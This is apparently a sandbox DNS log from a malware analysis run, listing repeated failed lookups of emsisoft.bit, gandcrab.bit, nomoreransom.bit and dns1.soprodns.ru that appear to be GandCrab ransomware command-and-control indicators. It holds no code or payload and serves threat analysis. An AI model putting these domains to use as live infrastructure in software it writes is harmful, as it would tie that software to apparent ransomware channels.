                                    Sep 1, 2022 00:02:48.262660027 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:48.282622099 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.302493095 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:48.359857082 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.378109932 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:49.030847073 CEST8.8.8.8192.168.2.30x9098Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.060447931 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:49.125612974 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.145709991 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:49.164716959 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.230854988 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:51.666511059 CEST8.8.8.8192.168.2.30xc31fName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.647394896 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:52.669127941 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.691092014 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:52.712511063 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.786346912 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:53.169249058 CEST8.8.8.8192.168.2.30xc31fName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.199151039 CEST8.8.8.8192.168.2.30xddd1Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.227545977 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:53.250277996 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.274090052 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:53.296488047 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.315620899 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:54.707915068 CEST8.8.8.8192.168.2.30x1ccaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.727380991 CEST8.8.8.8192.168.2.30x1ccaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.735213995 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:54.755316019 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.777358055 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:54.797842026 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.826921940 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:55.222019911 CEST8.8.8.8192.168.2.30x7331Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.248954058 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:55.282449961 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.303663969 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:55.325366020 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.344696999 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:55.919511080 CEST8.8.8.8192.168.2.30x8ac0Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.952475071 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:55.974069118 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.995476007 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:56.016655922 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:56.038196087 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:57.439387083 CEST8.8.8.8192.168.2.30xc34eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.449079037 CEST8.8.8.8192.168.2.30xc34eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.467147112 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:57.488708973 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.511897087 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:57.530978918 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.561358929 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:00.010236025 CEST8.8.8.8192.168.2.30xe6aaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.035882950 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:00.057038069 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.076392889 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:00.097615957 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.121129990 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:01.584554911 CEST8.8.8.8192.168.2.30x1eaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.595273972 CEST8.8.8.8192.168.2.30x1eaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.622442007 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:01.644107103 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.665334940 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:01.686562061 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.706001043 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:02.779787064 CEST8.8.8.8192.168.2.30x9670Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.821990013 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:02.843368053 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.865358114 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:02.922287941 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.942126989 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:02.945770025 CEST8.8.8.8192.168.2.30xe6aaServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.418770075 CEST8.8.8.8192.168.2.30x101cName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.446106911 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:03.465781927 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.485872984 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:03.505850077 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.524724007 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:03.967163086 CEST8.8.8.8192.168.2.30xe6aaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.580583096 CEST8.8.8.8192.168.2.30x1236Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.616434097 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:05.638950109 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.661201954 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:05.683096886 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.704983950 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:06.090673923 CEST8.8.8.8192.168.2.30x1236Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.253566980 CEST8.8.8.8192.168.2.30x32f7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.279741049 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:06.300148010 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.318766117 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:06.339133978 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.360065937 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:07.230133057 CEST8.8.8.8192.168.2.30xf50dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.261197090 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:07.297318935 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.321963072 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:07.345874071 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.367491961 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:08.672029018 CEST8.8.8.8192.168.2.30x5b1cName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.740346909 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:08.766110897 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.827946901 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:08.846530914 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.866904974 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:11.907406092 CEST8.8.8.8192.168.2.30xb93eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.145453930 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:13.167514086 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.187902927 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:13.209469080 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.232753992 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:15.875538111 CEST8.8.8.8192.168.2.30x78aaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.886709929 CEST8.8.8.8192.168.2.30x78aaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.902874947 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:15.921664953 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.941783905 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:15.960310936 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.978528023 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:17.783536911 CEST8.8.8.8192.168.2.30x78aaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:17.989558935 CEST8.8.8.8192.168.2.30xd2e7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.019994974 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:18.040131092 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.060370922 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:18.080894947 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.102590084 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:18.650096893 CEST8.8.8.8192.168.2.30xe3b2Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.676616907 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:18.696774960 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.717092037 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:18.736999989 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.754909992 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:19.210956097 CEST8.8.8.8192.168.2.30x6266Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.238610029 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:19.258774996 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.276746988 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:19.296673059 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.316821098 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:19.696104050 CEST8.8.8.8192.168.2.30xd2e7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.938867092 CEST8.8.8.8192.168.2.30x8bb8Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.971436024 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:19.991856098 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.010216951 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:20.031111956 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.051709890 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:20.256568909 CEST8.8.8.8192.168.2.30x3233Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.283133984 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:20.303747892 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.323898077 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:20.344026089 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.366065979 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:21.609051943 CEST8.8.8.8192.168.2.30x9a4bName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.641108990 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:21.663789988 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.686964035 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:21.708765030 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.729496956 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:22.926181078 CEST8.8.8.8192.168.2.30x6c47Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:22.956406116 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:22.978058100 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:22.999502897 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:23.021095037 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:23.042824030 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:23.514621973 CEST8.8.8.8192.168.2.30x6c47Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:23.968266010 CEST8.8.8.8192.168.2.30x878dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:23.997780085 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:24.018424988 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:24.039185047 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:24.059684038 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:24.078253031 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:25.255103111 CEST8.8.8.8192.168.2.30xa1caName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.281069994 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:25.299524069 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.319861889 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:25.340485096 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.361062050 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:25.566684961 CEST8.8.8.8192.168.2.30xa11dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.593641996 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:25.611632109 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.631575108 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:25.649888039 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.669991970 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:25.946975946 CEST8.8.8.8192.168.2.30xa1caName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.542138100 CEST8.8.8.8192.168.2.30x9a4bServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.874851942 CEST8.8.8.8192.168.2.30xc72eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.904150963 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:26.929198980 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.951956987 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:26.976304054 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.997859001 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:26.998966932 CEST8.8.8.8192.168.2.30xc72eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.328942060 CEST8.8.8.8192.168.2.30xb6eaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.362921000 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:28.383085012 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.538108110 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:28.558254004 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.578342915 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:28.692234039 CEST8.8.8.8192.168.2.30xb6eaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:29.338186979 CEST8.8.8.8192.168.2.30xe04eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:29.362001896 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:29.383466005 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
